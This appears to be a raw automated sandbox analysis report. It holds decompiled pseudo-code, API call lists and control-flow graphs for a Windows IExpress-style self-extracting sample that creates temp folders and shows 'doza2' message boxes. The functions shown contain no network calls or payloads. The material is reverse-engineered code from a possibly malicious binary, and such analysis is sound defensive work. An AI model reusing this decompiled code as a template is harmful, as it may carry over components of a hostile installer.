                                                                                                                                                                                                                                    0x00405836
                                                                                                                                                                                                                                    0x0040583d
                                                                                                                                                                                                                                    0x0040584b
                                                                                                                                                                                                                                    0x00405851
                                                                                                                                                                                                                                    0x00405855
                                                                                                                                                                                                                                    0x0040585a
                                                                                                                                                                                                                                    0x0040585c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040585e
                                                                                                                                                                                                                                    0x00405811
                                                                                                                                                                                                                                    0x00405817
                                                                                                                                                                                                                                    0x00405819
                                                                                                                                                                                                                                    0x0040581f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040581f
                                                                                                                                                                                                                                    0x00405791
                                                                                                                                                                                                                                    0x00405797
                                                                                                                                                                                                                                    0x0040579c
                                                                                                                                                                                                                                    0x0040579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004057a0
                                                                                                                                                                                                                                    0x004057a9
                                                                                                                                                                                                                                    0x004057ae
                                                                                                                                                                                                                                    0x004057b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004057b0
                                                                                                                                                                                                                                    0x0040579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405769
                                                                                                                                                                                                                                    0x00405762
                                                                                                                                                                                                                                    0x00405753
                                                                                                                                                                                                                                    0x0040574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                                                    0x00405864
                                                                                                                                                                                                                                    0x00405717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056c3
                                                                                                                                                                                                                                    0x004056c5
                                                                                                                                                                                                                                    0x004056c9
                                                                                                                                                                                                                                    0x004056ce
                                                                                                                                                                                                                                    0x004056d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056d6
                                                                                                                                                                                                                                    0x004056d6
                                                                                                                                                                                                                                    0x004056d8
                                                                                                                                                                                                                                    0x004056dd
                                                                                                                                                                                                                                    0x004056df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056e1
                                                                                                                                                                                                                                    0x004056e2
                                                                                                                                                                                                                                    0x004056e4
                                                                                                                                                                                                                                    0x004056e6
                                                                                                                                                                                                                                    0x004056eb
                                                                                                                                                                                                                                    0x004056ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040586c
                                                                                                                                                                                                                                    0x00405878
                                                                                                                                                                                                                                    0x0040587e
                                                                                                                                                                                                                                    0x00405882
                                                                                                                                                                                                                                    0x00405883
                                                                                                                                                                                                                                    0x00405889
                                                                                                                                                                                                                                    0x0040588e
                                                                                                                                                                                                                                    0x0040588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405896
                                                                                                                                                                                                                                    0x004056ed
                                                                                                                                                                                                                                    0x004056df
                                                                                                                                                                                                                                    0x004056d0
                                                                                                                                                                                                                                    0x004056c1
                                                                                                                                                                                                                                    0x004056a8
                                                                                                                                                                                                                                    0x0040565b
                                                                                                                                                                                                                                    0x0040565b
                                                                                                                                                                                                                                    0x0040565d
                                                                                                                                                                                                                                    0x00405669
                                                                                                                                                                                                                                    0x00405669
                                                                                                                                                                                                                                    0x0040565f
                                                                                                                                                                                                                                    0x0040565f
                                                                                                                                                                                                                                    0x00405665
                                                                                                                                                                                                                                    0x00405667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405667
                                                                                                                                                                                                                                    0x0040566c
                                                                                                                                                                                                                                    0x00405673
                                                                                                                                                                                                                                    0x00405678
                                                                                                                                                                                                                                    0x0040567a
                                                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                                                    0x0040589b
                                                                                                                                                                                                                                    0x00405680
                                                                                                                                                                                                                                    0x00405685
                                                                                                                                                                                                                                    0x0040568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040568c
                                                                                                                                                                                                                                    0x0040567a
                                                                                                                                                                                                                                    0x0040560e
                                                                                                                                                                                                                                    0x00405613
                                                                                                                                                                                                                                    0x0040561a
                                                                                                                                                                                                                                    0x00405620
                                                                                                                                                                                                                                    0x00405626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405626
                                                                                                                                                                                                                                    0x004055db
                                                                                                                                                                                                                                    0x004055e0
                                                                                                                                                                                                                                    0x004055e7
                                                                                                                                                                                                                                    0x004055f1
                                                                                                                                                                                                                                    0x004055f6
                                                                                                                                                                                                                                    0x004055f6
                                                                                                                                                                                                                                    0x004055f6
                                                                                                                                                                                                                                    0x004058b7
                                                                                                                                                                                                                                    0x004058c7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 004055CF
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00405638
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0040564C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00405620
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                      • Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 004056B9
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0040571E
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00405737
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 004057CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004057EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00405802
                                                                                                                                                                                                                                      • Part of subcall function 00402630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00402654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00405830
                                                                                                                                                                                                                                      • Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
                                                                                                                                                                                                                                      • Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
                                                                                                                                                                                                                                      • Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
                                                                                                                                                                                                                                      • Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00405878
                                                                                                                                                                                                                                      • Part of subcall function 0040597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
                                                                                                                                                                                                                                      • Part of subcall function 0040597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                    • API String ID: 2436801531-3855382519
                                                                                                                                                                                                                                    • Opcode ID: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
                                                                                                                                                                                                                                    • Instruction ID: d5c9d26d297622afc2c63048806d0aa51a227b55250bd62e7bce8c8ac459e010
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4971864637cee8b0fcbe78389781779da4c8e8b84f5700c2434fd0c7404e9403
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE810871A046085ADB20AB319D45BEB726DDB50304F0444BBF986F32D1DF7C8D828E5D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004044B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 406 4044b9-4044f8 407 404679-40467b 406->407 408 4044fe-404525 LoadStringA 406->408 409 40467c-40468c call 406ce0 407->409 410 404562-404568 408->410 411 404527-40452e call 40681f 408->411 413 40456b-404570 410->413 418 404530-40453d call 4067c9 411->418 419 40453f 411->419 413->413 416 404572-40457c 413->416 420 4045c9-4045cb 416->420 421 40457e-404580 416->421 418->419 425 404544-404554 MessageBoxA 418->425 419->425 423 404607-404617 LocalAlloc 420->423 424 4045cd-4045cf 420->424 426 404583-404588 421->426 429 40455a-40455d 423->429 430 40461d-404628 call 401680 423->430 428 4045d2-4045d7 424->428 425->429 426->426 431 40458a-40458c 426->431 428->428 432 4045d9-4045ed LocalAlloc 428->432 429->409 436 40462d-40463d MessageBeep call 40681f 430->436 434 40458f-404594 431->434 432->429 435 4045f3-404605 call 40171e 432->435 434->434 437 404596-4045ad LocalAlloc 434->437 435->436 445 40464e 436->445 446 40463f-40464c call 4067c9 436->446 437->429 440 4045af-4045c7 call 40171e 437->440 440->436 447 404653-404677 MessageBoxA LocalFree 445->447 446->445 446->447 447->409
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E004044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x408004; // 0x8f135e3b
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x408a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x409a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00401680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0040171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0040171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0040681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E004067C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0040681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E004067C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00406CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                    0x004044b9
                                                                                                                                                                                                                                    0x004044c4
                                                                                                                                                                                                                                    0x004044cb
                                                                                                                                                                                                                                    0x004044d8
                                                                                                                                                                                                                                    0x004044e4
                                                                                                                                                                                                                                    0x004044eb
                                                                                                                                                                                                                                    0x004044ee
                                                                                                                                                                                                                                    0x004044ef
                                                                                                                                                                                                                                    0x004044ef
                                                                                                                                                                                                                                    0x004044f1
                                                                                                                                                                                                                                    0x004044f7
                                                                                                                                                                                                                                    0x004044f8
                                                                                                                                                                                                                                    0x0040467b
                                                                                                                                                                                                                                    0x004044fe
                                                                                                                                                                                                                                    0x00404509
                                                                                                                                                                                                                                    0x00404518
                                                                                                                                                                                                                                    0x00404525
                                                                                                                                                                                                                                    0x00404562
                                                                                                                                                                                                                                    0x00404568
                                                                                                                                                                                                                                    0x00404568
                                                                                                                                                                                                                                    0x0040456b
                                                                                                                                                                                                                                    0x0040456b
                                                                                                                                                                                                                                    0x0040456d
                                                                                                                                                                                                                                    0x0040456e
                                                                                                                                                                                                                                    0x00404572
                                                                                                                                                                                                                                    0x00404578
                                                                                                                                                                                                                                    0x0040457c
                                                                                                                                                                                                                                    0x004045cb
                                                                                                                                                                                                                                    0x00404607
                                                                                                                                                                                                                                    0x00404607
                                                                                                                                                                                                                                    0x0040460d
                                                                                                                                                                                                                                    0x00404613
                                                                                                                                                                                                                                    0x00404617
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040461d
                                                                                                                                                                                                                                    0x00404623
                                                                                                                                                                                                                                    0x00404626
                                                                                                                                                                                                                                    0x00404628
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404628
                                                                                                                                                                                                                                    0x004045cd
                                                                                                                                                                                                                                    0x004045cd
                                                                                                                                                                                                                                    0x004045cf
                                                                                                                                                                                                                                    0x004045cf
                                                                                                                                                                                                                                    0x004045d2
                                                                                                                                                                                                                                    0x004045d2
                                                                                                                                                                                                                                    0x004045d4
                                                                                                                                                                                                                                    0x004045d5
                                                                                                                                                                                                                                    0x004045db
                                                                                                                                                                                                                                    0x004045de
                                                                                                                                                                                                                                    0x004045e3
                                                                                                                                                                                                                                    0x004045e9
                                                                                                                                                                                                                                    0x004045ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004045f3
                                                                                                                                                                                                                                    0x004045fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00404602
                                                                                                                                                                                                                                    0x004045ed
                                                                                                                                                                                                                                    0x0040457e
                                                                                                                                                                                                                                    0x0040457e
                                                                                                                                                                                                                                    0x00404580
                                                                                                                                                                                                                                    0x00404580
                                                                                                                                                                                                                                    0x00404583
                                                                                                                                                                                                                                    0x00404583
                                                                                                                                                                                                                                    0x00404585
                                                                                                                                                                                                                                    0x00404586
                                                                                                                                                                                                                                    0x0040458a
                                                                                                                                                                                                                                    0x0040458c
                                                                                                                                                                                                                                    0x0040458f
                                                                                                                                                                                                                                    0x0040458f
                                                                                                                                                                                                                                    0x00404591
                                                                                                                                                                                                                                    0x00404592
                                                                                                                                                                                                                                    0x0040459b
                                                                                                                                                                                                                                    0x0040459e
                                                                                                                                                                                                                                    0x004045a3
                                                                                                                                                                                                                                    0x004045a9
                                                                                                                                                                                                                                    0x004045ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004045af
                                                                                                                                                                                                                                    0x004045af
                                                                                                                                                                                                                                    0x004045bf
                                                                                                                                                                                                                                    0x0040462d
                                                                                                                                                                                                                                    0x00404630
                                                                                                                                                                                                                                    0x0040463d
                                                                                                                                                                                                                                    0x0040464e
                                                                                                                                                                                                                                    0x0040464e
                                                                                                                                                                                                                                    0x0040463f
                                                                                                                                                                                                                                    0x00404640
                                                                                                                                                                                                                                    0x00404647
                                                                                                                                                                                                                                    0x0040464c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040464c
                                                                                                                                                                                                                                    0x00404666
                                                                                                                                                                                                                                    0x0040466d
                                                                                                                                                                                                                                    0x0040466f
                                                                                                                                                                                                                                    0x00404675
                                                                                                                                                                                                                                    0x00404675
                                                                                                                                                                                                                                    0x004045ad
                                                                                                                                                                                                                                    0x00404527
                                                                                                                                                                                                                                    0x0040452e
                                                                                                                                                                                                                                    0x0040453f
                                                                                                                                                                                                                                    0x0040453f
                                                                                                                                                                                                                                    0x00404530
                                                                                                                                                                                                                                    0x00404531
                                                                                                                                                                                                                                    0x00404538
                                                                                                                                                                                                                                    0x0040453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040453d
                                                                                                                                                                                                                                    0x00404554
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x0040455a
                                                                                                                                                                                                                                    0x00404525
                                                                                                                                                                                                                                    0x0040468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 004045A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 004045E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0040460D
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00404630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00404666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0040466F
                                                                                                                                                                                                                                      • Part of subcall function 0040681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
                                                                                                                                                                                                                                      • Part of subcall function 0040681F: GetSystemMetrics.USER32(0000004A), ref: 004068A7
                                                                                                                                                                                                                                      • Part of subcall function 0040681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
                                                                                                                                                                                                                                      • Part of subcall function 0040681F: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
                                                                                                                                                                                                                                      • Part of subcall function 0040681F: RegCloseKey.ADVAPI32(?), ref: 00406902
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$doza2
                                                                                                                                                                                                                                    • API String ID: 3244514340-3130468218
                                                                                                                                                                                                                                    • Opcode ID: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
                                                                                                                                                                                                                                    • Instruction ID: f9d95c897c3f9acb34889c8f4230c3a0684cd2a5052bf7c23177ba80834ac1ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61510BB1900215AFDB219F28CD48BA77B68EF85304F1045BAFE45B7281DB3ADD15CB58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004053A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E004053A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x408004; // 0x8f135e3b
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0040171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00401680(_t32, 0x104, _t20);
					E0040658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00406CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x408a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                    0x004053ac
                                                                                                                                                                                                                                    0x004053b3
                                                                                                                                                                                                                                    0x004053b9
                                                                                                                                                                                                                                    0x004053bb
                                                                                                                                                                                                                                    0x004053bd
                                                                                                                                                                                                                                    0x004053bf
                                                                                                                                                                                                                                    0x004053d1
                                                                                                                                                                                                                                    0x004053d6
                                                                                                                                                                                                                                    0x004053e0
                                                                                                                                                                                                                                    0x004053e2
                                                                                                                                                                                                                                    0x004053f5
                                                                                                                                                                                                                                    0x004053fb
                                                                                                                                                                                                                                    0x00405402
                                                                                                                                                                                                                                    0x0040540b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405413
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405415
                                                                                                                                                                                                                                    0x00405416
                                                                                                                                                                                                                                    0x00405427
                                                                                                                                                                                                                                    0x0040542a
                                                                                                                                                                                                                                    0x0040542b
                                                                                                                                                                                                                                    0x00405434
                                                                                                                                                                                                                                    0x00405434
                                                                                                                                                                                                                                    0x0040543a
                                                                                                                                                                                                                                    0x0040544c
                                                                                                                                                                                                                                    0x0040544c
                                                                                                                                                                                                                                    0x00405452
                                                                                                                                                                                                                                    0x0040545a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040545e
                                                                                                                                                                                                                                    0x0040545f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405452
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                    • API String ID: 1082909758-3862032828
                                                                                                                                                                                                                                    • Opcode ID: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
